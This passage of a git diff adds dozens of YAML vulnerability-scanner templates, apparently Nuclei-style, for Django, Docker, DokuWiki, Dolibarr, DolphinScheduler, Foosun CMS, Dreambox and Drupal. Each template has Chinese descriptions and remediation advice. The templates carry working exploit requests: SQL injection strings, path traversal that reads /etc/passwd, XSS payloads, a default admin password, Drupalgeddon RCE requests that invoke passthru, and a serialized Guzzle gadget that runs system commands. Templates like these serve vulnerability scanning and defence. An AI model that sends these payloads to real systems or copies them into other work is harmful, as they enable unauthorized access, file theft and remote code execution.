1.11.29之前的1.11.x版本、2.2.11之前的2.2.x版本和3.0.4之前的3.0.x版本中存在SQL注入漏洞。攻击者可借助特制的SQL语句利用该漏洞查看、添加、修改或删除数据库中的信息。 + severity: high + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + https://www.djangoproject.com/weblog/2020/mar/04/security-releases/ + + 临时修复方案: + 1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。 + 2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。 + 3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。 + 4、严格限制网站用户的数据库的操作权限,给此用户提供仅仅能够满足其工作的权限,从而最大限度的减少注入攻击对数据库的危害。 + 5、避免网站显示SQL错误信息,比如类型错误、字段不匹配等,防止攻击者利用这些错误信息进行一些判断。 + 6、过滤危险字符,例如:采用正则表达式匹配union、sleep、and、select、load_file等关键字,如果匹配到则终止运行。 +requests: +- matchers: + - type: word + condition: and + words: + - DatabaseError at + - 'ORA-29257:' + - 'ORA-06512:' + - 'Request Method:' + path: + - '{{BaseURL}}/?q=20)%20%3D%201%20OR%20(select%20utl_inaddr.get_host_name((SELECT%20version%20FROM%20v%24instance))%20from%20dual)%20is%20null%20%20OR%20(1%2B1' + method: GET diff --git a/config/51pwn/yaml/Docker/docker-compose-config.yaml b/config/51pwn/yaml/Docker/docker-compose-config.yaml new file mode 100755 index 000000000..bed191e8d --- /dev/null +++ b/config/51pwn/yaml/Docker/docker-compose-config.yaml @@ -0,0 +1,36 @@ +id: docker-compose-config +info: + name: docker-compose.yml exposure + author: + - l0ne1y + description: |- + Docker Compose 敏感信息泄露 + docker-compose.yml是 docker-compose 的配置文件。它允许同时部署、组合和配置多个 docker 容器。Docker 的“规则”是将每个进程外包给自己的 Docker 容器。 + 攻击者可利用此漏洞获取docker真实的环境配置。 + severity: medium + remediation: |- + 官方修复建议: + 升级系统至无漏洞版本,或于官网下载安全补丁。 + https://www.docker.com/get-started/ + + 配置服务器以防止未经授权的访问、目录列表等。考虑定期运行扫描和进行审核,以帮助检测未来的错误配置或丢失的补丁。 +requests: +- matchers: + - type: dsl + dsl: + - 'regex("^version: ", body) && contains(body, "services:") && status_code==200 + && status_code!=403' + matchers-condition: and + path: + - '{{BaseURL}}/docker-compose.yml' + - '{{BaseURL}}/docker-compose.prod.yml' + - '{{BaseURL}}/docker-compose.production.yml' + - '{{BaseURL}}/docker-compose.staging.yml' + - '{{BaseURL}}/docker-compose.dev.yml' + - '{{BaseURL}}/docker-compose-dev.yml' + - '{{BaseURL}}/docker-compose.override.yml' + method: GET + max-redirects: 3 + redirects: true + req-condition: true + stop-at-first-match: true diff --git a/config/51pwn/yaml/Docker/docker-registry.yaml b/config/51pwn/yaml/Docker/docker-registry.yaml new file mode 100755 index 000000000..9a610122e --- /dev/null +++ b/config/51pwn/yaml/Docker/docker-registry.yaml @@ -0,0 +1,24 @@ +id: docker-registry +info: + name: Docker Registry Listing + author: + - l0ne1y + description: |- + Docker Registry API未授权访问 + Docker Registry API未授权访问,错误配置的Docker Registry,攻击者可以借机窃取机密数据、攻陷目标、打断正常业务。 + severity: medium +requests: +- matchers: + - type: word + words: + - '"repositories":' + - type: word + part: header + words: + - application/json + matchers-condition: and + path: + - '{{BaseURL}}/v2/_catalog' + method: GET + max-redirects: 1 + redirects: true diff --git a/config/51pwn/yaml/Docker/dockercfg-config.yaml b/config/51pwn/yaml/Docker/dockercfg-config.yaml new file mode 100755 index 000000000..daf295a1a --- /dev/null +++ b/config/51pwn/yaml/Docker/dockercfg-config.yaml @@ -0,0 +1,33 @@ +id: dockercfg-config +info: + name: Detect .dockercfg + author: + - l0ne1y + description: |- + Docker Config 敏感信息泄露 + Docker Config 存在信息泄露漏洞,攻击者可以利用此漏洞可以获取敏感信息。 + severity: low + remediation: |- + 官方修复方案:
升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.docker.com/get-started/ + + 临时修复方案:
去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 +requests: +- matchers: + - type: word + condition: and + words: + - '"email":' + - '"auth":' + - type: word + part: header + words: + - text/plain + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/.dockercfg' + - '{{BaseURL}}/.docker/config.json' + method: GET diff --git a/config/51pwn/yaml/Docker/dockerfile-hidden-disclosure.yaml b/config/51pwn/yaml/Docker/dockerfile-hidden-disclosure.yaml new file mode 100755 index 000000000..0c8f44de8 --- /dev/null +++ b/config/51pwn/yaml/Docker/dockerfile-hidden-disclosure.yaml @@ -0,0 +1,37 @@ +id: dockerfile-hidden-disclosure +info: + name: Dockerfile Hidden Disclosure + author: + - l0ne1y + description: |- + Docker Dockerfile 敏感信息泄露 + Docker中的Dockerfile存在信息泄露,攻击者可利用此漏洞获取Docker关键配置信息。 + severity: medium + remediation: |2- + + 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.docker.com/get-started/ + + 临时修复方案: + 1.去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2.正确配置服务器以防止未经授权的访问、目录列表等信息。 +requests: +- matchers: + - type: regex + part: body + regex: + - ^(?:FROM(?:CACHE)?|RUN|ADD|WORKDIR|ENV|EXPOSE|\#)\s+[ -~]+ + - type: status + status: + - 200 + - type: word + part: header + negative: true + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/.dockerfile' + - '{{BaseURL}}/.Dockerfile' + method: GET diff --git a/config/51pwn/yaml/Docker/exposed-docker-api.yaml b/config/51pwn/yaml/Docker/exposed-docker-api.yaml new file mode 100755 index 000000000..209876eb5 --- /dev/null +++ b/config/51pwn/yaml/Docker/exposed-docker-api.yaml @@ -0,0 +1,38 @@ +id: exposed-docker-api +info: + name: Exposed Docker API + author: + - l0ne1y + description: |- + Docker API 暴露 + Docker API 暴露,攻击者可利用此漏洞来获取环境的敏感信息。 + severity: low + remediation: |2- + + 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.docker.com/get-started/ + + 临时修复方案: + 1.去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面 + 2.正确配置服务器以防止未经授权的访问、目录列表等信息。 +requests: +- matchers: + - type: word + part: header + words: + - application/json + - type: word + condition: and + part: body + words: + - KernelVersion + - BuildTime + - type: status + status: + - 200 + matchers-condition: and + path: + - http://{{Hostname}}/version + - http://{{Hostname}}/v1.24/version + method: GET diff --git a/config/51pwn/yaml/Docker/misconfigured-docker.yaml b/config/51pwn/yaml/Docker/misconfigured-docker.yaml new file mode 100755 index 000000000..c42663eb9 --- /dev/null +++ b/config/51pwn/yaml/Docker/misconfigured-docker.yaml @@ -0,0 +1,32 @@ +id: misconfigured-docker +info: + name: Docker Container - Misconfiguration Exposure + author: + - l0ne1y + description: |- + Docker错误配置不当 + 利用 docker 错误配置,攻击者可以接管整个docker环境的权限。 + severity: critical + remediation: |- + 官方修复方案: + 升级系统至无漏洞版本,或于官网下载安全补丁 + https://www.docker.com/get-started/ + + 临时修复方案: + 1.去除页面、cookie或缓存中涉及的敏感信息或删除泄露信息页面。 + 2.正确配置服务器以防止未经授权的访问、目录列表等信息。 +requests: +- matchers: + - type: word + condition: and + words: + - '"ParentId":' + - '"Container":' + - '"Labels":' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/images/json' + method: GET diff --git a/config/51pwn/yaml/DokuWiki/CVE-2017-12583.yaml b/config/51pwn/yaml/DokuWiki/CVE-2017-12583.yaml new file mode 100755 index 000000000..6753e9cb9 --- /dev/null +++ b/config/51pwn/yaml/DokuWiki/CVE-2017-12583.yaml @@ -0,0 +1,35 @@ +id: CVE-2017-12583 +info: + name: Reflected XSS in doku.php + author: + - l0ne1y + description: |- + DokuWiki 跨站脚本漏洞 + DokuWiki是德国软件开发者Andreas Gohr所研发的一款基于PHP的Wiki引擎,它主要用于中小团队和个人网站知识库的管理,并提供版本控制、全文检索和权限控制等功能。 + + DokuWiki 2017-02-19b及之前的版本中的doku.php文件存在跨站脚本漏洞。远程攻击者可利用该漏洞注入任意的Web脚本或HTML。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/splitbrain/dokuwiki + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + part: body + words: + - Unable to parse at parameter "". + - type: word + part: header + words: + - text/html + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/dokuwiki/doku.php?id=wiki:welcome&at=' + method: GET diff --git a/config/51pwn/yaml/Dolibarr/CVE-2012-1226.yaml b/config/51pwn/yaml/Dolibarr/CVE-2012-1226.yaml new file mode 100755 index 000000000..798949d82 --- /dev/null +++ b/config/51pwn/yaml/Dolibarr/CVE-2012-1226.yaml @@ -0,0 +1,35 @@ +id: CVE-2012-1226 +info: + name: Dolibarr ERP/CRM 3.2 Alpha - Multiple Directory Traversal Vulnerabilities + author: + - l0ne1y + description: |- + Dolibarr 任意文件读取漏洞 + + Dolibarr 是一个简单的基于web的企业的ERP和CRM系统。 + + Dolibarr CMS 3.2.0 Alpha中存在多个任意文件读取漏洞。远程攻击者可利用这些漏洞借助(1)document.php的file参数或(2)comm/action/fiche.php的create操作中的backtopage参数中的“..”读取任意文件,也可能执行任意代码。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + /~https://github.com/Dolibarr/dolibarr/ + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/document.php?modulepart=project&file=../../../../../../../etc/passwd' + method: GET diff --git a/config/51pwn/yaml/Dolibarr/CVE-2018-10095.yaml b/config/51pwn/yaml/Dolibarr/CVE-2018-10095.yaml new file mode 100755 index 000000000..01734c4a2 --- /dev/null +++ b/config/51pwn/yaml/Dolibarr/CVE-2018-10095.yaml @@ -0,0 +1,35 @@ +id: CVE-2018-10095 +info: + name: Dolibarr before 7.0.2 allows XSS. + author: + - l0ne1y + description: |- + Dolibarr 跨站脚本漏洞 + Dolibarr是法国Dolibarr基金会的一套基于Web的企业资源计划(ERP)和客户关系管理(CRM)系统。该系统可用来管理产品、库存、发票、订单等。 + + Dolibarr 7.0.2之前版本中存在跨站脚本漏洞。远程攻击者可通过向adherents/cartes/carte.php脚本发送‘foruserlogin’参数利用该漏洞注入任意的Web脚本或HTML。 + severity: medium + remediation: |- + 官方修复方案: + 1、目前厂商已发布升级补丁以修复漏洞,补丁获取链接: + /~https://github.com/Dolibarr/dolibarr/blob/7.0.2/ChangeLog + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + part: body + words: + - + - type: status + status: + - 200 + - type: word + part: header + words: + - text/html + matchers-condition: and + path: + - '{{BaseURL}}/dolibarr/adherents/cartes/carte.php?&mode=cardlogin&foruserlogin=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&model=5160&optioncss=print' + method: GET diff --git a/config/51pwn/yaml/DolphinScheduler/dolphinscheduler-default-login.yaml b/config/51pwn/yaml/DolphinScheduler/dolphinscheduler-default-login.yaml new file mode 100755 index 000000000..e13ee23fd --- /dev/null +++ b/config/51pwn/yaml/DolphinScheduler/dolphinscheduler-default-login.yaml @@ -0,0 +1,40 @@ +id: dolphinscheduler-default-login +info: + name: Apache DolphinScheduler Default Login + author: + - l0ne1y + description: |- + Apache DolphinScheduler 默认口令登录漏洞 + Apache DolphinScheduler是一个分布式去中心化,易扩展的可视化DAG工作流任务调度平台。其web管理后台默认账户为admin/dolphinscheduler123 + severity: high + remediation: |- + 1、建议系统管理人员将已发现的弱口令立即改成强口令,并拉网式排查所有系统管理员、用户、设备的弱口令,清扫未发现的弱口令。 + 2、弱口令重在管理。企业应制定强口令制度(如:密码需包含大小写字母、数字、特殊字符至少三种格式,长度不少于十位,并且密码键盘排列无序,密码企业、个人信息无关联。 + 3、弱口令排查方式可以通过汇总企业所有人员账户后根据强口令规则匹配自查、个性化制定字典暴力破解两种方式。 + 4、推荐强口令在线生成:[https://suijimimashengcheng.51240.com/](https://suijimimashengcheng.51240.com/) + 5、推荐口令强度在线检测:[https://howsecureismypassword.net/](https://howsecureismypassword.net/) +requests: +- matchers: + - type: word + condition: and + part: body + words: + - '"msg":"login success"' + - '"sessionId":' + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /dolphinscheduler/login HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + userName={{user}}&userPassword={{pass}} + attack: pitchfork + payloads: + pass: + - dolphinscheduler123 + user: + - admin diff --git a/config/51pwn/yaml/DomPHP/CVE-2014-10037.yaml b/config/51pwn/yaml/DomPHP/CVE-2014-10037.yaml new file mode 100755 index 000000000..94d8cdc9b --- /dev/null +++ b/config/51pwn/yaml/DomPHP/CVE-2014-10037.yaml @@ -0,0 +1,34 @@ +id: CVE-2014-10037 +info: + name: DomPHP 0.83 - Directory Traversal + author: + - l0ne1y + description: |- + DomPHP任意文件读取漏洞 + DomPHP是一套基于PHP的通过使用Dom(文件对象模型)库读取XML文件的Web应用程序。 + + DomPHP 0.83及之前版本中存在目录遍历漏洞,该漏洞源于photoalbum/index.php脚本没有充分过滤‘url’参数。远程攻击者可借助目录遍历字符‘..’利用该漏洞读取任意文件。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + http://www.domphp.com/ + + 临时修复方案: + 1、过滤\".\",使用户在url中不能回溯上级目录。 + 2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 + 3、禁止系统提供目录遍历服务,如:php.ini配置open_basedir限定文件访问范围。 + 4、文件路径保存至数据库,让用户提交文件对应ID下载文件。 + 5、用户下载文件之前进行权限校验。 +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/photoalbum/index.php?urlancien=&url=../../../../../../../../../../../../etc/passwd%00' + method: GET diff --git a/config/51pwn/yaml/Dotnetcms/Dotnetcms-SQLi.yaml b/config/51pwn/yaml/Dotnetcms/Dotnetcms-SQLi.yaml new file mode 100755 index 000000000..6fdfc23b1 --- /dev/null +++ b/config/51pwn/yaml/Dotnetcms/Dotnetcms-SQLi.yaml @@ -0,0 +1,29 @@ +id: Dotnetcms-SQLi +info: + name: Dotnetcms SQLi + author: + - l0ne1y + description: |- + Foosun cms .net版本 City_ajax.aspx 参数 id SQL注入漏洞 + Foosun CMS是一款内容管理系统。 + + Foosun(风讯)CMS SQL注入漏洞存在于City_ajax.aspx 页面,该页面存在SQL注入,导致攻击者可以利用漏洞以当前用户权限发起SQL注入攻击,攻击者可以修改任意表中的数据或执行其他注入操作。 + severity: high + remediation: |- + 官方修复建议 + 建议更新到官方最新版本,地址为 https://www.foosun.net/ + + 临时修复方案:
1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。
2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。
3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。
4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 +requests: +- matchers: + - type: word + part: body + words: + - '{{md5(''{{randstr}}'')}}' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/user/City_ajax.aspx?CityId=99''union%20select%20sys.fn_sqlvarbasetostr(HashBytes(''MD5'',''{{randstr}}'')),2--' + method: GET diff --git a/config/51pwn/yaml/Dream Multimedia Dreambox devices/CVE-2017-15287.yaml b/config/51pwn/yaml/Dream Multimedia Dreambox devices/CVE-2017-15287.yaml new file mode 100755 index 000000000..7ca0921df --- /dev/null +++ b/config/51pwn/yaml/Dream Multimedia Dreambox devices/CVE-2017-15287.yaml @@ -0,0 +1,28 @@ +id: CVE-2017-15287 +info: + name: Dreambox WebControl 2.0.0 - Cross-Site Scripting + author: + - l0ne1y + description: |- + Dream Multimedia Dreambox设备BouquetEditor WebPlugin 跨站脚本漏洞 + Dream Multimedia Dreambox devices是德国Dream Multimedia公司生产的一款基于Linux的数字电视机顶盒。BouquetEditor WebPlugin是其中的一个具有频道命名、排序等功能的的插件。 + + Dream Multimedia Dreambox设备中的BouquetEditor WebPlugin存在跨站脚本漏洞。远程攻击者可利用该漏洞注入任意的Web脚本或HTML。 + severity: medium + remediation: |- + 官方修复方案: + 1、建议用户到官方获取最新补丁或者最新版本程序: + https://dreamboxedit.com/ + + 临时修复方案: + 1、对输入(和URL参数)进行过滤,对输出进行编码,白名单和黑名单结合。也就是对提交的所有内容进行过滤,对url中的参数进行过滤,过滤掉会导致脚本执行的相关内容;然后对动态输出到页面的内容进行html编码,使脚本无法在浏览器中执行。虽然对输入过滤可以被绕过,但是也还是会拦截很大一部分的XSS攻击;最后对字符进行白名单或者黑名单限制。 +requests: +- matchers: + - type: word + words: + - 'Unknown command: ' + raw: + - | + GET /webadmin/pkg?command= HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded diff --git a/config/51pwn/yaml/Drupai CMS/CVE-2014-3704.yaml b/config/51pwn/yaml/Drupai CMS/CVE-2014-3704.yaml new file mode 100755 index 000000000..cbfd42870 --- /dev/null +++ b/config/51pwn/yaml/Drupai CMS/CVE-2014-3704.yaml @@ -0,0 +1,34 @@ +id: CVE-2014-3704 +info: + name: Drupal SQL Injection + author: + - l0ne1y + description: |- + Drupal up to 7.31 Database Abstraction API expandArguments SQL注入 + Drupal是使用PHP语言编写的开源内容管理框架(CMF),它由内容管理系统(CMS)和PHP开发框架(Framework)共同构成。 + + Drupal Core存在SQL注入漏洞。攻击者可利用此漏洞提升特权,执行任意代码。 + severity: critical + remediation: |- + 官方修复建议: + 目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载: + https://www.drupal.org/ + + 临时修复建议: +
1、使用预编译语句,使用PDO需要注意不要将变量直接拼接到PDO语句中。所有的查询语句都使用数据库提供的参数化查询接口,参数化的语句使用参数而不是将用户输入变量嵌入到SQL语句中。当前几乎所有的数据库系统都提供了参数化SQL语句执行接口,使用此接口可以非常有效的防止SQL注入攻击。
2、对进入数据库的特殊字符(’”<>&*;等)进行转义处理,或编码转换。
3、确认每种数据的类型,比如数字型的数据就必须是数字,数据库中的存储字段必须对应为int型。
4、数据长度应该严格规定,能在一定程度上防止比较长的SQL注入语句无法正确执行。 +requests: +- matchers: + - type: status + status: + - 500 + - type: word + condition: and + part: body + words: + - PDOException + - e807f1fcf82d132f9bb018ca6738a19f + matchers-condition: and + path: + - '{{BaseURL}}/?q=node&destination=node' + method: POST + body: pass=lol&form_build_id=&form_id=user_login_block&op=Log+in&name[0 or updatexml(0x23,concat(1,md5(1234567890)),1)%23]=bob&name[0]=a diff --git a/config/51pwn/yaml/Drupai CMS/CVE-2018-7600.yaml b/config/51pwn/yaml/Drupai CMS/CVE-2018-7600.yaml new file mode 100755 index 000000000..61ced3a80 --- /dev/null +++ b/config/51pwn/yaml/Drupai CMS/CVE-2018-7600.yaml @@ -0,0 +1,60 @@ +id: CVE-2018-7600 +info: + name: Drupal - Remote Code Execution + author: + - l0ne1y + description: |- + Drupal Drupalgeddon2 远程代码执行 + Drupal是Drupal社区所维护的一套用PHP语言开发的免费、开源的内容管理系统。 + + Drupal多个子版本存在远程代码执行漏洞,攻击者可能利用此漏洞实现远程代码执行攻击,从而影响到业务系统的安全性。 + severity: critical + remediation: |- + 官方修复建议: + + 用户可联系供应商获得补丁信息: + https://www.drupal.org/sa-core-2018-002 + + 临时修复建议: +
1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。
2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: word + part: header + words: + - application/json + - type: word + part: body + words: + - '{{randstr}}' + - type: status + status: + - 200 + matchers-condition: and + raw: + - | + POST /user/register?element_parents=account/mail/%23value&ajax_form=1&_wrapper_format=drupal_ajax HTTP/1.1 + Host: {{Hostname}} + Accept: application/json + Referer: {{Hostname}}/user/register + X-Requested-With: XMLHttpRequest + Content-Type: multipart/form-data; boundary=---------------------------99533888113153068481322586663 + + -----------------------------99533888113153068481322586663 + Content-Disposition: form-data; name="mail[#post_render][]" + + passthru + -----------------------------99533888113153068481322586663 + Content-Disposition: form-data; name="mail[#type]" + + markup + -----------------------------99533888113153068481322586663 + Content-Disposition: form-data; name="mail[#markup]" + + echo {{randstr}} + -----------------------------99533888113153068481322586663 + Content-Disposition: form-data; name="form_id" + + user_register_form + -----------------------------99533888113153068481322586663 + Content-Disposition: form-data; name="_drupal_ajax" diff --git a/config/51pwn/yaml/Drupai CMS/CVE-2018-7602.yaml b/config/51pwn/yaml/Drupai CMS/CVE-2018-7602.yaml new file mode 100755 index 000000000..c416b07cb --- /dev/null +++ b/config/51pwn/yaml/Drupai CMS/CVE-2018-7602.yaml @@ -0,0 +1,70 @@ +id: CVE-2018-7602 +info: + name: Drupal - Remote Code Execution + author: + - l0ne1y + description: |- + Drupal 远程代码执行漏洞 + Drupal是一个由Dries Buytaert创立的自由开源的内容管理系统,用PHP语言写成。在业界Drupal常被视为内容管理框架,而非一般意义上的内容管理系统。 + + Drupal Core 7.x、8.x的多个子系统存在远程代码执行漏洞。远程攻击者可通过发送特制数组数据利用该漏洞在目标系统上执行任意代码。 + severity: critical + remediation: |- + 官方修复建议: + 厂商已发布漏洞修复程序,请及时关注更新: + https://www.drupal.org/sa-core-2018-004 + + 临时修复建议: +
1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。
2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: word + words: + - CVE-2018-7602-POC + extractors: + - name: userid + type: regex + regex: + - + group: 1 + part: body + internal: true + - name: form_build_id + type: regex + regex: + - + group: 1 + part: body + internal: true + raw: + - | + POST /?q=user%2Flogin HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_id=user_login&name={{username}}&pass={{password}}&op=Log+in + - | + GET /?q={{url_encode("{{userid}}")}}%2Fcancel HTTP/1.1 + Host: {{Hostname}} + - | + POST /?q={{url_encode("{{userid}}")}}%2Fcancel&destination={{url_encode("{{userid}}")}}%2Fcancel%3Fq%5B%2523post_render%5D%5B%5D%3Dpassthru%26q%5B%2523type%5D%3Dmarkup%26q%5B%2523markup%5D%3Decho+COP-2067-8102-EVC+|+rev HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_id=user_cancel_confirm_form&form_token={{form_token}}&_triggering_element_name=form_id&op=Cancel+account + - | + POST /?q=file%2Fajax%2Factions%2Fcancel%2F%23options%2Fpath%2F{{form_build_id}} HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + form_build_id={{form_build_id}} + max-redirects: 2 + cookie-reuse: true + redirects: true diff --git a/config/51pwn/yaml/Drupai CMS/CVE-2018-9205.yaml b/config/51pwn/yaml/Drupai CMS/CVE-2018-9205.yaml new file mode 100755 index 000000000..b275843a3 --- /dev/null +++ b/config/51pwn/yaml/Drupai CMS/CVE-2018-9205.yaml @@ -0,0 +1,29 @@ +id: CVE-2018-9205 +info: + name: Drupal avatar_uploader v7.x-1.0-beta8 - Local File Inclusion + author: + - l0ne1y + description: |- + Drupal avatar_uploader 任意文件读取漏洞 + Drupal 是一款使用PHP语言开发的开源内容管理系统。avatar_uploader 是 Drupal 中用于实现上传用户图片功能的模块。 + Drupa avatar_uploader 7.x-1.0-beta8 版本中存在安全漏洞,该漏洞源于 view.php 文件中的代码没有校验用户或过滤文件路径。攻击者可利用该漏洞下载任意文件。 + severity: high + remediation: |- + 官方修复建议: + 目前厂商暂未发布修复措施解决此安全问题,建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法: + https://www.drupal.org/ + + 临时修复建议: +
1、过滤\".\",使用户在url中不能回溯上级目录。
2、正则匹配严格判断用户输入参数的格式,对用户传过来的文件名参数进行硬编码或统一编码,对文件类型进行白名单控制,对包含恶意字符或者空字符的参数进行拒绝。 +requests: +- matchers: + - type: regex + regex: + - 'root:.*:0:0:' + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/sites/all/modules/avatar_uploader/lib/demo/view.php?file=../../../../../../../../../../../etc/passwd' + method: GET diff --git a/config/51pwn/yaml/Drupai CMS/CVE-2019-6340.yaml b/config/51pwn/yaml/Drupai CMS/CVE-2019-6340.yaml new file mode 100755 index 000000000..580918e8f --- /dev/null +++ b/config/51pwn/yaml/Drupai CMS/CVE-2019-6340.yaml @@ -0,0 +1,45 @@ +id: CVE-2019-6340 +info: + name: Drupal 8 core RESTful Web Services RCE + author: + - l0ne1y + description: |- + Drupal 远程代码执行漏洞 + 在 8.5.11 之前的 Drupal 8.5.x 和 8.6.10 之前的 Drupal 8.6.x 中,某些字段类型无法正确清理来自非表单源的数据。在某些情况下,这可能会导致任意 PHP 代码执行。仅当满足以下条件之一时,站点才会受此影响:站点启用了 Drupal 8 核心 RESTful Web 服务(rest)模块并允许 PATCH 或 POST 请求,或者站点启用了另一个 Web 服务模块,例如 JSON :Drupal 8 中的 API,或 Drupal 7 中的服务或 RESTful Web 服务。 + severity: critical + remediation: | + 官方修复建议: + + Drupal官方已经发布了最新版本,请受影响的用户尽快升级进行防护。 + + 暂时不便升级的用户,可以采取以下措施进行临时防护: + + 用户可以禁用所有Web服务模块,或将Web服务器配置为不允许对Web服务资源进行PUT / PATCH / POST请求。 + + 请注意,Web服务资源可能在多个路径上可用,具体取决于服务器的配置。 对于Drupal 7,资源通常可通过路径(clean URL)和通过“q”查询参数获得。 对于Drupal 8,当使用index.php /作为前缀时,路径可能仍然有效。 + + 详细步骤及官方建议请参考Drupal官方通告: + + https://www.drupal.org/sa-core-2019-003 + + 临时修复建议: +
1、在执行涉及到可以将字符串作为代码执行的函数时,需要严格验证用户传递的参数,同时尽量避免用户控制参数。
2、使用escapeshellarg函数处理相关参数。Escapeshellarg函数会将任何引起参数或命令结束的字符进行转义,如单引号“’”会被转义为“\\’”,双引号“””会被转义为“\\””,分号“;”会被转义为“\\;”,这样escapeshellarg会将参数内容限制在一对单引号或双引号里面,转义参数中所包含的单引号或双引号,使其无法对当前执行进行截断,实现防范命令注入攻击的目的。 +requests: +- matchers: + - type: word + condition: and + part: body + words: + - uid= + - gid= + - groups= + - type: status + status: + - 200 + matchers-condition: and + path: + - '{{BaseURL}}/node/1?_format=hal_json' + method: POST + body: '{ "link": [ { "value": "link", "options": "O:24:\"GuzzleHttp\\Psr7\\FnStream\":2:{s:33:\"\u0000GuzzleHttp\\Psr7\\FnStream\u0000methods\";a:1:{s:5:\"close\";a:2:{i:0;O:23:\"GuzzleHttp\\HandlerStack\":3:{s:32:\"\u0000GuzzleHttp\\HandlerStack\u0000handler\";s:2:\"id\";s:30:\"\u0000GuzzleHttp\\HandlerStack\u0000stack\";a:1:{i:0;a:1:{i:0;s:6:\"system\";}}s:31:\"\u0000GuzzleHttp\\HandlerStack\u0000cached\";b:0;}i:1;s:7:\"resolve\";}}s:9:\"_fn_close\";a:2:{i:0;r:4;i:1;s:7:\"resolve\";}}" + } ], "_links": { "type": { "href": "http://192.168.1.25/drupal-8.6.9/rest/type/shortcut/default" + } } }' diff --git a/config/51pwn/yaml/Drupal/CVE-2021-32682.yaml 